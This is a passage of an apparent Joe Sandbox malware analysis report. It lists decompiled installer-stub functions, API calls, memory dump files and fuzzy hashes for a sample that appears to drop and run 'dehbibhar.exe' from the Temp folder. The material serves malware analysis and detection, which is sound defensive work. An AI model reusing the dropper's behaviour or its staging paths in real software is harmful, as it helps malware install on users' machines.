                          • LoadImageW.USER32 ref: 00401E15
                          • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                          • DeleteObject.GDI32(00000000), ref: 00401E39
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                          • String ID:
                          • API String ID: 1849352358-0
                          • Opcode ID: ac67a32c1c63d157babab1e4358f55078bade20f941efb87d7a14794f6aec10b
                          • Instruction ID: 2ec253bf93b3ee2af7d9c2e9edfaee5893d577595a7c220e34a49f748079806b
                          • Opcode Fuzzy Hash: ac67a32c1c63d157babab1e4358f55078bade20f941efb87d7a14794f6aec10b
                          • Instruction Fuzzy Hash: 9F212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389D51DB98
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 73%
                          			E00401E4E(intOrPtr __edx) {
                          				void* __edi;
                          				int _t9;
                          				signed char _t15;
                          				struct HFONT__* _t18;
                          				intOrPtr _t30;
                          				void* _t31;
                          				struct HDC__* _t33;
                          				void* _t35;
                          
                          				_t30 = __edx;
                          				_t33 = GetDC( *(_t35 - 8));
                          				_t9 = E00402D84(2);
                          				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                          				0x40cdc8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                          				ReleaseDC( *(_t35 - 8), _t33);
                          				 *0x40cdd8 = E00402D84(3);
                          				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                          				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                          				 *0x40cddf = 1;
                          				 *0x40cddc = _t15 & 0x00000001;
                          				 *0x40cddd = _t15 & 0x00000002;
                          				 *0x40cdde = _t15 & 0x00000004;
                          				E00406544(_t9, _t31, _t33, 0x40cde4,  *((intOrPtr*)(_t35 - 0x2c)));
                          				_t18 = CreateFontIndirectW(0x40cdc8);
                          				_push(_t18);
                          				_push(_t31);
                          				E0040644E();
                          				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t35 - 4));
                          				return 0;
                          			}











                          0x00401e4e
                          0x00401e59
                          0x00401e5b
                          0x00401e68
                          0x00401e7f
                          0x00401e84
                          0x00401e91
                          0x00401e96
                          0x00401e9a
                          0x00401ea5
                          0x00401eac
                          0x00401ebe
                          0x00401ec4
                          0x00401ec9
                          0x00401ed3
                          0x00402638
                          0x0040156d
                          0x00402ba4
                          0x00402c2d
                          0x00402c39

                          APIs
                          • GetDC.USER32(?), ref: 00401E51
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                          • ReleaseDC.USER32 ref: 00401E84
                            • Part of subcall function 00406544: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\efnvpl,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
                            • Part of subcall function 00406544: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\efnvpl,00000000,004226E8,?,004055A0,004226E8,00000000), ref: 00406743
                          • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED3
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                          • String ID:
                          • API String ID: 2584051700-0
                          • Opcode ID: 80dbc2b2fae4c7c566210f3db186a97745b6b4268190bf82bcd042cd3ccc65f3
                          • Instruction ID: 4fb721614cfc657e7ae40bea064ac1047d1e810b67000393f6ef8132d91dbde4
                          • Opcode Fuzzy Hash: 80dbc2b2fae4c7c566210f3db186a97745b6b4268190bf82bcd042cd3ccc65f3
                          • Instruction Fuzzy Hash: E101D471940651EFEB006BB4AE8ABEA3FB0AF15305F10497AF541B61E2CAB90404DB2C
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 59%
                          			E00401C43(intOrPtr __edx) {
                          				int _t29;
                          				long _t30;
                          				signed int _t32;
                          				WCHAR* _t35;
                          				long _t36;
                          				int _t41;
                          				signed int _t42;
                          				int _t46;
                          				int _t56;
                          				intOrPtr _t57;
                          				struct HWND__* _t63;
                          				void* _t64;
                          
                          				_t57 = __edx;
                          				_t29 = E00402D84(3);
                          				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                          				 *(_t64 - 0x18) = _t29;
                          				_t30 = E00402D84(4);
                          				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                          				 *(_t64 + 8) = _t30;
                          				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                          					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
                          				}
                          				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                          				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                          					 *(_t64 + 8) = E00402DA6(0x44);
                          				}
                          				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                          				_push(1);
                          				if(__eflags != 0) {
                          					_t61 = E00402DA6();
                          					_t32 = E00402DA6();
                          					asm("sbb ecx, ecx");
                          					asm("sbb eax, eax");
                          					_t35 =  ~( *_t31) & _t61;
                          					__eflags = _t35;
                          					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                          					goto L10;
                          				} else {
                          					_t63 = E00402D84();
                          					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                          					_t41 = E00402D84(2);
                          					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                          					_t56 =  *(_t64 - 0x1c) >> 2;
                          					if(__eflags == 0) {
                          						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                          						L10:
                          						 *(_t64 - 0x38) = _t36;
                          					} else {
                          						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                          						asm("sbb eax, eax");
                          						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                          					}
                          				}
                          				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
                          				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                          					_push( *(_t64 - 0x38));
                          					E0040644E();
                          				}
                          				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t64 - 4));
                          				return 0;
                          			}















                          0x00401c43
                          0x00401c45
                          0x00401c4c
                          0x00401c4f
                          0x00401c52
                          0x00401c5c
                          0x00401c60
                          0x00401c63
                          0x00401c6c
                          0x00401c6c
                          0x00401c6f
                          0x00401c73
                          0x00401c7c
                          0x00401c7c
                          0x00401c7f
                          0x00401c83
                          0x00401c85
                          0x00401cda
                          0x00401cdc
                          0x00401ce7
                          0x00401cf1
                          0x00401cf4
                          0x00401cf4
                          0x00401cfd
                          0x00000000
                          0x00401c87
                          0x00401c8e
                          0x00401c90
                          0x00401c93
                          0x00401c99
                          0x00401ca0
                          0x00401ca3
                          0x00401ccb
                          0x00401d03
                          0x00401d03
                          0x00401ca5
                          0x00401cb3
                          0x00401cbb
                          0x00401cbe
                          0x00401cbe
                          0x00401ca3
                          0x00401d06
                          0x00401d09
                          0x00401d0f
                          0x00402ba4
                          0x00402ba4
                          0x00402c2d
                          0x00402c39

                          APIs
                          • SendMessageTimeoutW.USER32 ref: 00401CB3
                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: MessageSend$Timeout
                          • String ID: !
                          • API String ID: 1777923405-2657877971
                          • Opcode ID: 63cd3b03ac6125a5c39657f4fd9aa1571fe8c5c2b1a809795ec118cdc527ca65
                          • Instruction ID: 9cc957e5ccccb3d4664e0e2a58dae5c7f5d60dbdf5ff161d76b900271ba72f5e
                          • Opcode Fuzzy Hash: 63cd3b03ac6125a5c39657f4fd9aa1571fe8c5c2b1a809795ec118cdc527ca65
                          • Instruction Fuzzy Hash: B9219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 77%
                          			E00404D10(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                          				char _v68;
                          				char _v132;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				signed int _t23;
                          				signed int _t24;
                          				void* _t31;
                          				void* _t33;
                          				void* _t34;
                          				void* _t44;
                          				signed int _t46;
                          				signed int _t50;
                          				signed int _t52;
                          				signed int _t53;
                          				signed int _t55;
                          
                          				_t23 = _a16;
                          				_t53 = _a12;
                          				_t44 = 0xffffffdc;
                          				if(_t23 == 0) {
                          					_push(0x14);
                          					_pop(0);
                          					_t24 = _t53;
                          					if(_t53 < 0x100000) {
                          						_push(0xa);
                          						_pop(0);
                          						_t44 = 0xffffffdd;
                          					}
                          					if(_t53 < 0x400) {
                          						_t44 = 0xffffffde;
                          					}
                          					if(_t53 < 0xffff3333) {
                          						_t52 = 0x14;
                          						asm("cdq");
                          						_t24 = 1 / _t52 + _t53;
                          					}
                          					_t25 = _t24 & 0x00ffffff;
                          					_t55 = _t24 >> 0;
                          					_t46 = 0xa;
                          					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                          				} else {
                          					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                          					_t50 = 0;
                          				}
                          				_t31 = E00406544(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                          				_t33 = E00406544(_t44, _t50, _t55,  &_v132, _t44);
                          				_t34 = E00406544(_t44, _t50, 0x423708, 0x423708, _a8);
                          				wsprintfW(_t34 + lstrlenW(0x423708) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                          				return SetDlgItemTextW( *0x4291f8, _a4, 0x423708);
                          			}



















                          0x00404d19
                          0x00404d1e
                          0x00404d26
                          0x00404d27
                          0x00404d34
                          0x00404d3c
                          0x00404d3d
                          0x00404d3f
                          0x00404d41
                          0x00404d43
                          0x00404d46
                          0x00404d46
                          0x00404d4d
                          0x00404d53
                          0x00404d53
                          0x00404d5a
                          0x00404d61
                          0x00404d64
                          0x00404d67
                          0x00404d67
                          0x00404d6b
                          0x00404d7b
                          0x00404d7d
                          0x00404d80
                          0x00404d29
                          0x00404d29
                          0x00404d30
                          0x00404d30
                          0x00404d88
                          0x00404d93
                          0x00404da9
                          0x00404dba
                          0x00404dd6

                          APIs
                          • lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DB1
                          • wsprintfW.USER32 ref: 00404DBA
                          • SetDlgItemTextW.USER32 ref: 00404DCD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: ItemTextlstrlenwsprintf
                          • String ID: %u.%u%s%s
                          • API String ID: 3540041739-3551169577
                          • Opcode ID: 86e502d9a8370dbc93398d3fbd174d64265af359c40653ed6c33f1a653f0c3b2
                          • Instruction ID: e9142b657f1eeb4cf11744ba9db0a0194b5dde25e0a765d2a17d7598676c161e
                          • Opcode Fuzzy Hash: 86e502d9a8370dbc93398d3fbd174d64265af359c40653ed6c33f1a653f0c3b2
                          • Instruction Fuzzy Hash: E911D8736041283BDB10666D9C45FAE3298DF81338F254237FA25F61D1D978D82182D8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 58%
                          			E00405DD6(WCHAR* _a4) {
                          				WCHAR* _t9;
                          
                          				_t9 = _a4;
                          				_push( &(_t9[lstrlenW(_t9)]));
                          				_push(_t9);
                          				if( *(CharPrevW()) != 0x5c) {
                          					lstrcatW(_t9, 0x40a014);
                          				}
                          				return _t9;
                          			}




                          0x00405dd7
                          0x00405de4
                          0x00405de5
                          0x00405df0
                          0x00405df8
                          0x00405df8
                          0x00405e00

                          APIs
                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405DDC
                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405DE6
                          • lstrcatW.KERNEL32(?,0040A014), ref: 00405DF8
                          Strings
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DD6
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: CharPrevlstrcatlstrlen
                          • String ID: C:\Users\user\AppData\Local\Temp\
                          • API String ID: 2659869361-3081826266
                          • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                          • Instruction ID: 7ce36c7f15bc9200e130dd8400e4741a81934e97230acaa32a90c98a69430a15
                          • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                          • Instruction Fuzzy Hash: 09D0A7311019347AC1117B44AC04DDF67ACEE86304381403BF101B70A4CB7C5D518BFD
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00403019(intOrPtr _a4) {
                          				long _t2;
                          				struct HWND__* _t3;
                          				struct HWND__* _t6;
                          
                          				if(_a4 == 0) {
                          					if( *0x420ec0 == 0) {
                          						_t2 = GetTickCount();
                          						if(_t2 >  *0x42a22c) {
                          							_t3 = CreateDialogParamW( *0x42a220, 0x6f, 0, E00402F93, 0);
                          							 *0x420ec0 = _t3;
                          							return ShowWindow(_t3, 5);
                          						}
                          						return _t2;
                          					} else {
                          						return E00406910(0);
                          					}
                          				} else {
                          					_t6 =  *0x420ec0;
                          					if(_t6 != 0) {
                          						_t6 = DestroyWindow(_t6);
                          					}
                          					 *0x420ec0 = 0;
                          					return _t6;
                          				}
                          			}






                          0x00403020
                          0x00403040
                          0x0040304a
                          0x00403056
                          0x00403067
                          0x00403070
                          0x00000000
                          0x00403075
                          0x0040307c
                          0x00403042
                          0x00403049
                          0x00403049
                          0x00403022
                          0x00403022
                          0x00403029
                          0x0040302c
                          0x0040302c
                          0x00403032
                          0x00403039
                          0x00403039

                          APIs
                          • DestroyWindow.USER32(?,00000000,004031F7,00000001,?,?,?,?,?,00403847,?), ref: 0040302C
                          • GetTickCount.KERNEL32 ref: 0040304A
                          • CreateDialogParamW.USER32 ref: 00403067
                          • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,00403847,?), ref: 00403075
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                          • String ID:
                          • API String ID: 2102729457-0
                          • Opcode ID: 9e4f0c6fd4882656516298184c032d47dc92d32e43a921afdb36728f0eb821a0
                          • Instruction ID: a5ec5a94053ed6ec85071f05b03f47ec4a0cd54214f56ca0ac695578935c79f2
                          • Opcode Fuzzy Hash: 9e4f0c6fd4882656516298184c032d47dc92d32e43a921afdb36728f0eb821a0
                          • Instruction Fuzzy Hash: 44F05430603620EBC2316F10FD0898B7B69FB04B43B424C7AF041B11A9CB7609828B9C
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 89%
                          			E004054DD(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                          				int _t15;
                          				long _t16;
                          
                          				_t15 = _a8;
                          				if(_t15 != 0x102) {
                          					if(_t15 != 0x200) {
                          						_t16 = _a16;
                          						L7:
                          						if(_t15 == 0x419 &&  *0x4236f4 != _t16) {
                          							_push(_t16);
                          							_push(6);
                          							 *0x4236f4 = _t16;
                          							E00404E9E();
                          						}
                          						L11:
                          						return CallWindowProcW( *0x4236fc, _a4, _t15, _a12, _t16);
                          					}
                          					if(IsWindowVisible(_a4) == 0) {
                          						L10:
                          						_t16 = _a16;
                          						goto L11;
                          					}
                          					_t16 = E00404E1E(_a4, 1);
                          					_t15 = 0x419;
                          					goto L7;
                          				}
                          				if(_a12 != 0x20) {
                          					goto L10;
                          				}
                          				E004044AF(0x413);
                          				return 0;
                          			}





                          0x004054e1
                          0x004054eb
                          0x00405507
                          0x00405529
                          0x0040552c
                          0x00405532
                          0x0040553c
                          0x0040553d
                          0x0040553f
                          0x00405545
                          0x00405545
                          0x0040554f
                          0x00000000
                          0x0040555d
                          0x00405514
                          0x0040554c
                          0x0040554c
                          0x00000000
                          0x0040554c
                          0x00405520
                          0x00405522
                          0x00000000
                          0x00405522
                          0x004054f1
                          0x00000000
                          0x00000000
                          0x004054f8
                          0x00000000

                          APIs
                          • IsWindowVisible.USER32(?), ref: 0040550C
                          • CallWindowProcW.USER32(?,?,?,?), ref: 0040555D
                            • Part of subcall function 004044AF: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044C1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: Window$CallMessageProcSendVisible
                          • String ID:
                          • API String ID: 3748168415-3916222277
                          • Opcode ID: 97a082d88a1cb55e03e66ec7543f709465f1e5e5e36f808a355b04b1bc4c309f
                          • Instruction ID: 896dd7550c11452a1c115f53988c63f353f89721b9370a05553ad38a214c3fb8
                          • Opcode Fuzzy Hash: 97a082d88a1cb55e03e66ec7543f709465f1e5e5e36f808a355b04b1bc4c309f
                          • Instruction Fuzzy Hash: 1601B171200609BFDF219F11DC81A6B3A27FB84354F100036FA01762D5C77A8E52DE5A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 90%
                          			E004063D5(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                          				int _v8;
                          				long _t21;
                          				long _t24;
                          				char* _t30;
                          
                          				asm("sbb eax, eax");
                          				_v8 = 0x800;
                          				_t21 = E00406374(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                          				_t30 = _a16;
                          				if(_t21 != 0) {
                          					L4:
                          					 *_t30 =  *_t30 & 0x00000000;
                          				} else {
                          					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                          					_t21 = RegCloseKey(_a20);
                          					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                          					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                          						goto L4;
                          					}
                          				}
                          				return _t21;
                          			}







                          0x004063e3
                          0x004063e5
                          0x004063fd
                          0x00406402
                          0x00406407
                          0x00406445
                          0x00406445
                          0x00406409
                          0x0040641b
                          0x00406426
                          0x0040642c
                          0x00406437
                          0x00000000
                          0x00000000
                          0x00406437
                          0x0040644b

                          APIs
                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,004226E8,00000000,?,?,C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\efnvpl,?,?,0040663C,80000002), ref: 0040641B
                          • RegCloseKey.ADVAPI32(?,?,0040663C,80000002,Software\Microsoft\Windows\CurrentVersion,C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\efnvpl,C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\efnvpl,C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\efnvpl,00000000,004226E8), ref: 00406426
                          Strings
                          • C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\efnvpl, xrefs: 004063DC
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
